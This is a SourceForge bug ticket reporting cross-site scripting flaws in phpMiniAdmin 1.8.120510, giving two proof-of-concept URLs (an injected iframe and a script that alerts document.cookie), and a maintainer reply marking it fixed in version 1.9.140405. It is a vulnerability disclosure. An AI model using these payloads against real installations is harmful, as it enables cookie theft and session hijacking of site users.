Work at SourceForge, help us to make it a better place! We have an immediate need for a Support Technician in our San Francisco or Denver office.

Close

#13 xss

v1.0 (example)
closed-fixed
nobody
None
5
2014-04-05
2013-01-22
Raul DIaz
No

phpMiniAdmin 1.8.120510 Multiple xss by :Dshellnoi_Unix
#P.O.C#
http://\[ip]/phpminiadmin.php?XSS=07c0922BDE0aaa&db=information_schema&q=SHOW+TABLE+STATUS+%3Ciframe%20src=%22http://xssed.com%22%3E

http://\[ip]/phpminiadmin.php?XSS=07c0922BDE0aaa&refresh=&p=&db=<script>alert(document.cookie)</script>&q=
#proof
http://www.freeimagehosting.net/cap87

Discussion

  • Oleg Savchuk
    Oleg Savchuk
    2014-04-05

    • status: open --> closed-fixed
    • Group: --> v1.0 (example)
     
  • Oleg Savchuk
    Oleg Savchuk
    2014-04-05

    fixed in version 1.9.140405